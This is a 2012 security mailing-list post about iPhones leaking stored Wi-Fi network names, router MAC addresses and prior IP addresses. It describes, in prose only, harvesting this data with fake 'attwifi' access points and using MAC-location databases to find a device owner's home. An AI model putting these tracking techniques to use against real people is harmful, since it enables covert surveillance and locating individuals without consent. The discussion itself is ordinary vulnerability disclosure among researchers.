Dailydave mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Wireless Disclosures

From: Robert Graham <robert_david_graham () yahoo com>
Date: Thu, 22 Mar 2012 15:30:57 -0700 (PDT)
In our experience, this is not exactly the case. What Robert describes does 
happen but, after a couple of minutes, if a connection has not yet
been established, the iPhone will indeed broadcast probes for all recently
connected SSIDs. How recent is recent? In our experiments, _all_ SSIDs
stored in the device were being disclosed.

We've seen this behavior with IOS 3, 4 and 5. This is obvious in
the attached packet capture screenshot, where one can see the initial
broadcasts to ANY as described by Robert but then comes the disclosure
with all stored SSIDs being broadcasted.



That's interesting.

My experience is that while sitting in the front lobby as employees walk by, I get more SSIDs from other devices than 
Apple's. What you are saying is that I need to be more patient.




The second disclosure that came up in the Ars comments has to do with
the MAC addresses of previously seen DHCP servers
This behavior is documented in RFC 4436 [4]:



I thought it ARPed the router, not the DHCP server, but either is allowed by the RFC.

It discloses these 3 MAC addresses after it "associates" to the access-point, but before it gets a DHCP address. It's 
very reliable. You can sit at an airport with a fake access-point broadcasting "attwifi" and "Apple Store" and get a 
ton of this info, even without giving them a DHCP assignment.

This also discloses the previously assigned IP address of the device, as well as the IP address of the router/DHCP 
server. These days, these addresses are almost always "local" addresses like 10.2.3.4, but sometimes you can get 
routable addresses, and thus find the "home" organization of the device..

In theory, you can use these MAC addresses with the Google, SkyHook, Microsoft, Apple, and Wigle.net databases to find 
their home address. Unfortunately, these databases now require two MAC addresses to work, in order to guard against 
this sort of abuse. The Wigle.net database allows this, but it's not very complete. But, if you have certain targets in 
mind, you can do your own GPS mapping of an area.

In theory, once you get these MAC addresses, you can send beacons from them with empty SSID fields, and otherwise 
silent devices will give up their SSIDs. Sadly, I haven't tested this yet, because my own home network separates the 
router and DHCP server from the access-points, so can't work for my devices this way.

_______________________________________________
Dailydave mailing list
Dailydave () lists immunityinc com
http://lists.immunityinc.com/mailman/listinfo/dailydave
Previous By Date Next
Previous By Thread Next

Current thread: